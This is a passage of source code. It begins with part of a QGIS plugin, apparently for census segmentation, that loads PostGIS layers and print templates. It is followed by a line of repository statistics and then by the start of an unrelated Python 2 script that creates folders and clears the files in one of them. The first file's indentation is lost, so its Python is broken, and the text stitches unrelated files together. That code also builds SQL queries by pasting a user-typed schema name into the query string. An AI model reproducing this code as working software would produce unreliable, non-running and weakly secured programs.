uri.setDataSource("","( select seg, replace(descripcion, '. ' , '\n') descripcion , viviendas, link, lpad( radio::text,2,'0') radio , st_collect(geom) geom FROM (select r3.radio , r3.seg, r3.viviendas, r3.descripcion, concat(lpad(r3.prov::text,2,'0'),lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'), lpad(r3.frac::text,2,'0'),lpad( r3.radio::text,2,'0') ,seg) link, coalesce(case when l.lado is null then null when count(*)=1 then ST_AddPoint(ST_MakeLine(st_startpoint(l.wkb_geometry_lado),max(l.wkb_geometry)),st_endpoint(l.wkb_geometry_lado)) else st_makeline(l.wkb_geometry order by orden_reco) end, st_makeline(ST_SetSRID(st_point(0,0),st_srid(wkb_geometry_lado))),ST_SetSRID(st_point(0,1), st_srid(wkb_geometry_lado)) ) geom from " + sql+ ".r3 left join " + sql+ ".segmentacion s on r3.segmento_id=s.segmento_id left join " +sql+ ".listado_geo l on l.id_list = s.listado_id group by r3.radio, r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio, l.lado, l.mza, l.wkb_geometry_lado ) foo group by radio , seg , viviendas , descripcion , link )", "geom" , "", "link")
layer = QgsVectorLayer(uri.uri(), "descripcion", "postgres")
if not layer.isValid():
print ("No se cargo capa Descripcion")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/descripcion.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########################### Agregar plantillas de salida##############
#### Plantilla tamaño A4 ###############
pry= QgsProject.instance()
#Añadi una verificación de la ruta del archivo qtp
#### Plantilla R3 ###############
rutaR3= origen + r'/plantillas/R3.qpt'
if os.path.exists(rutaR3):
with open(rutaR3, 'r') as templateFile:
myTemplateContent = templateFile.read()
layout=QgsPrintLayout(pry)
lmg = QgsProject.instance().layoutManager()
layout.setName("R3")
layout.initializeDefaults()
myDocument = QDomDocument()
myDocument.setContent(myTemplateContent)
ms = QgsMapSettings()
layout.loadFromTemplate(myDocument,QgsReadWriteContext(),True)
lmg.addLayout(layout)
else:
print("error en la ruta del archivo R3" )
#### Plantilla tamaño A4 ###############
rutaR4= origen + r'/plantillas/radio_A4.qpt'
if os.path.exists(rutaR4):
with open(rutaR4, 'r') as templateFile:
myTemplateContent = templateFile.read()
layout=QgsPrintLayout(pry)
lmg = QgsProject.instance().layoutManager()
layout.setName("A4")
layout.initializeDefaults()
myDocument = QDomDocument()
myDocument.setContent(myTemplateContent)
ms = QgsMapSettings()
layout.loadFromTemplate(myDocument,QgsReadWriteContext(),True)
lmg.addLayout(layout)
else:
print("error en la ruta del archivo" )
#### Plantilla tamaño A3 ###############
rutaR3= ruta= origen + r'/plantillas/radio_A3.qpt'
if os.path.exists(rutaR3):
with open(rutaR3, 'r') as templateFile:
myTemplateContent = templateFile.read()
layout=QgsPrintLayout(pry)
lmg = QgsProject.instance().layoutManager()
layout.setName("A3")
layout.initializeDefaults()
myDocument = QDomDocument()
myDocument.setContent(myTemplateContent)
ms = QgsMapSettings()
layout.loadFromTemplate(myDocument,QgsReadWriteContext(),True)
lmg.addLayout(layout)
else:
print("error en la ruta del archivo A3")
def runSegmento(self , iface):
from qgis.utils import iface
#####################################Conexion existente en el admnistrador de BD##############################################
##########Conexion desde BD a Postgis
QgsProject.instance().clear()
qs = QSettings()
dbHost = qs.value("PostgreSQL/connections/informatica/host",'10.70.80.62')
dbPort = qs.value("PostgreSQL/connections/informatica/port",'5432')
dbName = qs.value("PostgreSQL/connections/informatica/database",'DEVSEG')
############Pedir al usuario cargar los campos de usuario y contraseña
dbUsr = QInputDialog.getText(None, 'usuario', 'Introduce el nombre de usuario de la base de datos')
dbPwd = QInputDialog.getText(None, 'contraseña', 'Introduce la contraseña', QLineEdit.Password)
#####################################Conexion PostGIS##############################################
# introducimos nombre del servidor, puerto, nombre de la base de datos, usuario y contraseña
uri = QgsDataSourceUri()
uri.setConnection(dbHost,dbPort,dbName,dbUsr[0],dbPwd[0])
##############################Verificar Usuuario y Contraseña##########################################
# origen = QInputDialog.getText(None, 'origen', 'Introduce la ruta de acceso')
aglomerado = QInputDialog.getText(None, 'aglomerado', 'Introduce el nombre completo PPDDDLLL', text = 'e86154030')
origen = os.path.dirname(__file__)
####################### Agrego las tablas .CSV de datos geograficos############################
# Agrego tabla provincia
capa = origen + '/datos_prov/provincia.csv'
nomcapa = 'provincia'
layer = QgsVectorLayer(capa,nomcapa,'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
################## Agrego tabla departamento##################################
capa = (origen + '/datos_prov/departamentos.csv')
nomcapa = 'departamento'
layer = QgsVectorLayer(capa,nomcapa,'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
################## Agrego tabla localidad######################
capa = (origen + '/datos_prov/localidad.csv')
nomcapa = 'localidad'
layer = QgsVectorLayer(capa,nomcapa,'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
########################## Agrego todas las capas al proyecto###################################
#### agrego capa de puntitos
sql = aglomerado[0]
uri.setDataSource("", "(select r3.seg, r3.viviendas, r3.descripcion, concat(prov,lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'),lpad(r3.frac::text,2,'0'),lpad(r3.radio::text,2,'0'),seg) link, coalesce(st_collect(l.wkb_geometry_lado),st_makeline(st_point(0,0), st_point(1,1))) geolado, coalesce(st_collect(l.wkb_geometry),st_point(0,0)) geom from " + sql + ".r3 " +" join "+ sql+".segmentacion s on r3.segmento_id=s.segmento_id" + " join "+ sql + ".listado_geo l on l.id_list = s.listado_id group by r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio)","geom","", "link")
layer = QgsVectorLayer(uri.uri(), "Listado_viv", "postgres")
if not layer.isValid():
print ("No se cargo capa Listado")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_segmento/listadosegmento.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
#Agrego la capa SEGMENTOS
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "segmentos", "postgres")
if not layer.isValid():
print ("No se cargo capa segmento")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen + '/estilo_segmento/segmento.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########Agrego la capa Mascara
sql = aglomerado[0] + ".v_radios"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
vlayer = QgsVectorLayer(uri.uri(),"Mascara","postgres")
if not vlayer.isValid():
print ("No se cargola capa Mascara ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_segmento/mascara.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
# Agrego la capa ESPECIALES
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "especiales", "postgres")
if not layer.isValid():
print ("No se cargo la capa de codigos especiales")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen + '/estilo_segmento/especiales.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
####### Agrego la capa Radios desde BD
sql = aglomerado[0] + ".v_radios"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
vlayer = QgsVectorLayer(uri.uri(),"Radio","postgres")
if not vlayer.isValid():
print ("No se cargo la capa Radio ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_segmento/pradio.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
#Agrego la capa ETIQUETAS MANZANA
sql = aglomerado[0] + ".v_manzanas"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
layer = QgsVectorLayer(uri.uri(), "etiqueta_manzana", "postgres")
if not layer.isValid():
print ("el numero de aglomerado no es correcto")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_segmento/manzana.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
############################# Agrego la capa Descripcion nueva ###########################
sql = aglomerado[0]
uri.setDataSource("","( select seg, descripcion , viviendas, link, lpad( radio::text,2,'0') radio , st_collect(geom) geom FROM (select r3.radio , r3.seg, r3.viviendas, r3.descripcion, concat(lpad(r3.prov::text,2,'0'),lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'), lpad(r3.frac::text,2,'0'),lpad( r3.radio::text,2,'0') ,seg) link, coalesce(case when l.lado is null then null when count(*)=1 then ST_AddPoint(ST_MakeLine(st_startpoint(l.wkb_geometry_lado),max(l.wkb_geometry)),st_endpoint(l.wkb_geometry_lado)) else st_makeline(l.wkb_geometry order by orden_reco) end, st_makeline(ST_SetSRID(st_point(0,0),st_srid(wkb_geometry_lado))),ST_SetSRID(st_point(0,1), st_srid(wkb_geometry_lado)) ) geom from " + sql+ ".r3 left join " + sql+ ".segmentacion s on r3.segmento_id=s.segmento_id left join " +sql+ ".listado_geo l on l.id_list = s.listado_id group by r3.radio, r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio, l.lado, l.mza, l.wkb_geometry_lado ) foo group by radio , seg , viviendas , descripcion , link )", "geom" , "", "link")
layer = QgsVectorLayer(uri.uri(), "descripcion", "postgres")
if not layer.isValid():
print ("No se cargo capa Descripcion")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/descripcion.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
############################# Agrego la capa atlas segmento###########################
#uri.setDataSource("", "( select * ,concat(prov,lpad(dpto::text,3,'0'),lpad(codloc::text,3,'0'),lpad(frac::text,2,'0'),lpad(radio::text,2,'0'),seg) link, st_point(0,0) geom from indec.describe_segmentos_con_direcciones('" + sql + "'))","geom","", "segmento_id")
sql = "((((SELECT row_number() over () AS _uid_ , * , concat(prov,depto, loc,frac,radio,lpad(seg::text,2,'0')) linkcapa FROM (SELECT row_number () over () id, prov,depto,loc,frac,radio,seg, geom FROM (SELECT prov,depto,loc,frac,radio,seg,(st_union(geom )) geom FROM (SELECT substring(mza,1,2) prov, substring(mza, 3,3) depto, substring(mza,6,3) loc, substring(mza,9,2) frac, substring(mza,11,2) radio, seg, geom FROM (SELECT mzai mza, ladoi lado, segi seg , wkb_geometry geom FROM " + aglomerado[0] + ".arc" + " where segi is not null UNION SELECT mzad mza, ladod lado, segd seg, wkb_geometry geom FROM " + aglomerado[0] + ".arc" + " where segd is not null ) foo ) foo2 group by prov,depto,loc,frac,radio,seg ) foo3 ) AS _subq_1_ ) ) ) )"
uri.setDataSource("", sql ,"geom","","_uid_")
vlayer = QgsVectorLayer(uri.uri(),"capaseg","postgres")
if not vlayer.isValid():
print ("No se cargo la capa ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_segmento/capaconsulta.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
########################### Agregar plantillas de salida##############
########################### Agregar plantillas de salida##############
#### Plantilla tamaño A4 ###############
pry= QgsProject.instance()
#Añadi una verificación de la ruta del archivo qtp
ruta5= origen+ r'/plantillas/segmento_A4.qpt'
if os.path.exists(ruta5):
with open(ruta5, 'r') as templateFile:
myTemplateContent = templateFile.read()
layout=QgsPrintLayout(pry)
lmg = QgsProject.instance().layoutManager()
layout.setName("A4")
layout.initializeDefaults()
myDocument = QDomDocument()
myDocument.setContent(myTemplateContent)
ms = QgsMapSettings()
layout.loadFromTemplate(myDocument,QgsReadWriteContext(),True)
lmg.addLayout(layout)
else:
print("error en la ruta del archivo" )
#### Plantilla tamaño A3 ###############
ruta4= ruta= origen + r'/plantillas/segmento_A3.qpt'
if os.path.exists(ruta4):
with open(ruta4, 'r') as templateFile:
myTemplateContent = templateFile.read()
layout=QgsPrintLayout(pry)
lmg = QgsProject.instance().layoutManager()
layout.setName("A3")
layout.initializeDefaults()
myDocument = QDomDocument()
myDocument.setContent(myTemplateContent)
ms = QgsMapSettings()
layout.loadFromTemplate(myDocument,QgsReadWriteContext(),True)
lmg.addLayout(layout)
else:
print("error en la ruta del archivo A3")
def runFraccion(self, iface):
from qgis.utils import iface
#####################################Conexion existente en el admnistrador de BD##############################################
##########Conexion desde BD a Postgis
QgsProject.instance().clear()
qs = QSettings()
dbHost = qs.value("PostgreSQL/connections/informatica/host",'10.70.80.62')
dbPort = qs.value("PostgreSQL/connections/informatica/port",'5432')
dbName = qs.value("PostgreSQL/connections/informatica/database",'DEVSEG')
############Pedir al usuario cargar los campos de usuario y contraseña
dbUsr = QInputDialog.getText(None, 'usuario', 'Introduce el nombre de usuario de la base de datos')
dbPwd = QInputDialog.getText(None, 'contraseña', 'Introduce la contraseña', QLineEdit.Password)
#####################################Conexion PostGIS##############################################
# introducimos nombre del servidor, puerto, nombre de la base de datos, usuario y contraseña
uri = QgsDataSourceUri()
uri.setConnection(dbHost,dbPort,dbName,dbUsr[0],dbPwd[0])
##############################Verificar Usuuario y Contraseña##########################################
# origen = QInputDialog.getText(None, 'origen', 'Introduce la ruta de acceso')
aglomerado = QInputDialog.getText(None, 'aglomerado', 'Introduce el nombre completo PPDDDLLL', text = 'e86154030')
origen = os.path.dirname(__file__)
# print(sys.path[0])
# print (origen)
####################### Agrego las tablas .CSV de datos geograficos############################
####### Agrego tabla provincia
capa = (origen + '/datos_prov/provincia.csv')
nomcapa = 'provincia'
layer = QgsVectorLayer(capa,nomcapa, 'ogr' )
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
####### Agrego tabla departamento##################################
capa = (origen + '/datos_prov/departamentos.csv')
nomcapa = 'departamento'
layer = QgsVectorLayer(capa,nomcapa, 'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
####### Agrego tabla localidad######################
capa = (origen + '/datos_prov/localidad.csv')
nomcapa = 'localidad'
layer = QgsVectorLayer(capa,nomcapa,'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
########################## Agrego todas las capas al proyecto###################################
#### agrego capa de puntitos
sql = aglomerado[0]
uri.setDataSource("", "(select r3.seg, r3.viviendas, r3.descripcion, concat(prov,lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'),lpad(r3.frac::text,2,'0'),lpad(r3.radio::text,2,'0'),seg) link, coalesce(st_collect(l.wkb_geometry_lado),st_makeline(st_point(0,0), st_point(1,1))) geolado, coalesce(st_collect(l.wkb_geometry),st_point(0,0)) geom from " + sql + ".r3 " +" join "+ sql+".segmentacion s on r3.segmento_id=s.segmento_id" + " join "+ sql + ".listado_geo l on l.id_list = s.listado_id group by r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio)","geom","", "link")
layer = QgsVectorLayer(uri.uri(), "Listado_viv", "postgres")
if not layer.isValid():
print ("No se cargo capa Listado")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/listado.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########################### Agregar plantillas de salida##############
#### Plantilla tamaño A4 ###############
pry= QgsProject.instance()
#Añadi una verificación de la ruta del archivo qtp
####### Agrego la capa Segmento
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "Segmentacion", "postgres")
if not layer.isValid():
print ("No se cargo capa Segmento")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen + '/estilo_radio/segmentos.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########Agrego la capa Mascara
sql = aglomerado[0] + ".v_radios"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
vlayer = QgsVectorLayer(uri.uri(),"Mascara","postgres")
if not vlayer.isValid():
print ("No se cargola capa Mascara ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_radio/mascara.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
#######Agrego la capa Especiales
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "CodEspeciales", "postgres")
if not layer.isValid():
print ("No se cargo capa Codigos Especiales")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
| 49.810811 | 1,131 | 0.582501 | 3,928 | 36,860 | 5.397403 | 0.13442 | 0.049243 | 0.028867 | 0.017641 | 0.767935 | 0.758974 | 0.744352 | 0.74039 | 0.738361 | 0.732654 | 0 | 0.012152 | 0.247667 | 36,860 | 739 | 1,132 | 49.878214 | 0.752371 | 0.179951 | 0 | 0.743697 | 1 | 0.02521 | 0.289595 | 0.108683 | 0.002101 | 0 | 0 | 0 | 0 | 1 | 0.018908 | false | 0.006303 | 0.027311 | 0 | 0.052521 | 0.069328 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c85b219c6f44eb495f31f7adcae725faf69ba91f | 9,975 | py | Python | image_dicer/Scriptv3/a010_CreateFolders.py | tostathaina/farsight | 7e9d6d15688735f34f7ca272e4e715acd11473ff | [
"Apache-2.0"
] | 8 | 2016-07-22T11:24:19.000Z | 2021-04-10T04:22:31.000Z | image_dicer/Scriptv3/a010_CreateFolders.py | YanXuHappygela/Farsight | 1711b2a1458c7e035edd21fe0019a1f7d23fcafa | [
"Apache-2.0"
] | null | null | null | image_dicer/Scriptv3/a010_CreateFolders.py | YanXuHappygela/Farsight | 1711b2a1458c7e035edd21fe0019a1f7d23fcafa | [
"Apache-2.0"
] | 7 | 2016-07-21T07:39:17.000Z | 2020-01-29T02:03:27.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import shutil
import fnmatch
import os
# ---------------------------------------------------------------------------------------------------------------------------------------
# Create Folder
# ---------------------------------------------------------------------------------------------------------------------------------------
def main( LOCAL_DEB_DATASET_PATH, LOCAL_DATASET_PATH_EXE, LOCAL_DATASET_PATH_LOG, LOCAL_DATASET_PATH_DEBUG, LOCAL_DATASET_PATH_DATA, LOCAL_DATASET_PATH_DATA_DEBUG, LOCAL_DATASET_PATH_SEGM, LOCAL_DATASET_PATH_SEGM_DEBUG, LOCAL_DATASET_PATH_SEGM_DEBUG_L2, LOCAL_DATASET_PATH_SEGM_TEMP, LOCAL_DATASET_PATH_TRAC, LOCAL_DATASET_PATH_TRAC_DEBUG, LOCAL_DATASET_PATH_TRAC_DEBUG_L2, LOCAL_DATASET_PATH_TRAC_TEMP, GLOBAL_DATASET_PATH_RESULTS, LOCAL_DATASET_PATH_TRAC_RESULTS, LOCAL_DATASET_PATH_ASTRO_TRAC, LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS, LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG, LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2, LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP ):
if not os.path.isdir(LOCAL_DEB_DATASET_PATH):
print 'creating folder: '+LOCAL_DEB_DATASET_PATH
os.makedirs(LOCAL_DEB_DATASET_PATH)
else:
print 'erasing folder: '+LOCAL_DEB_DATASET_PATH
#for the_file in os.listdir(LOCAL_DEB_DATASET_PATH):
#file_path = os.path.join(LOCAL_DEB_DATASET_PATH, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_EXE):
print 'creating folder: '+LOCAL_DATASET_PATH_EXE
os.makedirs(LOCAL_DATASET_PATH_EXE)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_EXE
for the_file in os.listdir(LOCAL_DATASET_PATH_EXE):
file_path = os.path.join(LOCAL_DATASET_PATH_EXE, the_file)
try:
os.unlink(file_path)
except Exception, e:
print e
if not os.path.isdir(LOCAL_DATASET_PATH_LOG):
print 'creating folder: '+LOCAL_DATASET_PATH_LOG
os.makedirs(LOCAL_DATASET_PATH_LOG)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_LOG
#for the_file in os.listdir(LOCAL_DATASET_PATH_LOG):
#file_path = os.path.join(LOCAL_DATASET_PATH_LOG, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_DEBUG):
print 'creating folder: '+LOCAL_DATASET_PATH_DEBUG
os.makedirs(LOCAL_DATASET_PATH_DEBUG)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_DEBUG
#for the_file in os.listdir(LOCAL_DATASET_PATH_DEBUG):
#file_path = os.path.join(LOCAL_DATASET_PATH_DEBUG, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_DATA):
print 'creating folder: '+LOCAL_DATASET_PATH_DATA
os.makedirs(LOCAL_DATASET_PATH_DATA)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_DATA
#for the_file in os.listdir(LOCAL_DATASET_PATH_DATA):
#file_path = os.path.join(LOCAL_DATASET_PATH_DATA, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_DATA_DEBUG):
print 'creating folder: '+LOCAL_DATASET_PATH_DATA_DEBUG
os.makedirs(LOCAL_DATASET_PATH_DATA_DEBUG)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_DATA_DEBUG
#for the_file in os.listdir(LOCAL_DATASET_PATH_DATA_DEBUG):
#file_path = os.path.join(LOCAL_DATASET_PATH_DATA_DEBUG, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_SEGM):
print 'creating folder: '+LOCAL_DATASET_PATH_SEGM
os.makedirs(LOCAL_DATASET_PATH_SEGM)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_SEGM
#for the_file in os.listdir(LOCAL_DATASET_PATH_SEGM):
#file_path = os.path.join(LOCAL_DATASET_PATH_SEGM, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_SEGM_DEBUG):
print 'creating folder: '+LOCAL_DATASET_PATH_SEGM_DEBUG
os.makedirs(LOCAL_DATASET_PATH_SEGM_DEBUG)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_SEGM_DEBUG
#for the_file in os.listdir(LOCAL_DATASET_PATH_SEGM_DEBUG):
#file_path = os.path.join(LOCAL_DATASET_PATH_SEGM_DEBUG, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_SEGM_DEBUG_L2):
print 'creating folder: '+LOCAL_DATASET_PATH_SEGM_DEBUG_L2
os.makedirs(LOCAL_DATASET_PATH_SEGM_DEBUG_L2)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_SEGM_DEBUG_L2
#for the_file in os.listdir(LOCAL_DATASET_PATH_SEGM_DEBUG_L2):
#file_path = os.path.join(LOCAL_DATASET_PATH_SEGM_DEBUG_L2, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_SEGM_TEMP):
print 'creating folder: '+LOCAL_DATASET_PATH_SEGM_TEMP
os.makedirs(LOCAL_DATASET_PATH_SEGM_TEMP)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_SEGM_TEMP
#for the_file in os.listdir(LOCAL_DATASET_PATH_SEGM_TEMP):
#file_path = os.path.join(LOCAL_DATASET_PATH_SEGM_TEMP, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_TRAC):
print 'creating folder: '+LOCAL_DATASET_PATH_TRAC
os.makedirs(LOCAL_DATASET_PATH_TRAC)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_TRAC
#for the_file in os.listdir(LOCAL_DATASET_PATH_TRAC):
#file_path = os.path.join(LOCAL_DATASET_PATH_TRAC, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_TRAC_DEBUG):
print 'creating folder: '+LOCAL_DATASET_PATH_TRAC_DEBUG
os.makedirs(LOCAL_DATASET_PATH_TRAC_DEBUG)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_TRAC_DEBUG
#for the_file in os.listdir(LOCAL_DATASET_PATH_TRAC_DEBUG):
#file_path = os.path.join(LOCAL_DATASET_PATH_TRAC_DEBUG, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_TRAC_DEBUG_L2):
print 'creating folder: '+LOCAL_DATASET_PATH_TRAC_DEBUG_L2
os.makedirs(LOCAL_DATASET_PATH_TRAC_DEBUG_L2)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_TRAC_DEBUG_L2
#for the_file in os.listdir(LOCAL_DATASET_PATH_TRAC_DEBUG_L2):
#file_path = os.path.join(LOCAL_DATASET_PATH_TRAC_DEBUG_L2, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_TRAC_TEMP):
print 'creating folder: '+LOCAL_DATASET_PATH_TRAC_TEMP
os.makedirs(LOCAL_DATASET_PATH_TRAC_TEMP)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_TRAC_TEMP
#for the_file in os.listdir(LOCAL_DATASET_PATH_TRAC_TEMP):
#file_path = os.path.join(LOCAL_DATASET_PATH_TRAC_TEMP, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(GLOBAL_DATASET_PATH_RESULTS):
print 'creating folder: '+GLOBAL_DATASET_PATH_RESULTS
os.makedirs(GLOBAL_DATASET_PATH_RESULTS)
else:
print 'erasing folder: '+GLOBAL_DATASET_PATH_RESULTS
#for the_file in os.listdir(GLOBAL_DATASET_PATH_RESULTS):
#file_path = os.path.join(GLOBAL_DATASET_PATH_RESULTS, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_TRAC_RESULTS):
print 'creating folder: '+LOCAL_DATASET_PATH_TRAC_RESULTS
os.makedirs(LOCAL_DATASET_PATH_TRAC_RESULTS)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_TRAC_RESULTS
#for the_file in os.listdir(LOCAL_DATASET_PATH_TRAC_RESULTS):
#file_path = os.path.join(LOCAL_DATASET_PATH_TRAC_RESULTS, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_ASTRO_TRAC):
print 'creating folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC
os.makedirs(LOCAL_DATASET_PATH_ASTRO_TRAC)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC
#for the_file in os.listdir(LOCAL_DATASET_PATH_ASTRO_TRAC):
#file_path = os.path.join(LOCAL_DATASET_PATH_ASTRO_TRAC, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS):
print 'creating folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS
os.makedirs(LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS
#for the_file in os.listdir(LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS):
#file_path = os.path.join(LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG):
print 'creating folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG
os.makedirs(LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG
#for the_file in os.listdir(LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG):
#file_path = os.path.join(LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2):
print 'creating folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2
os.makedirs(LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2)
else:
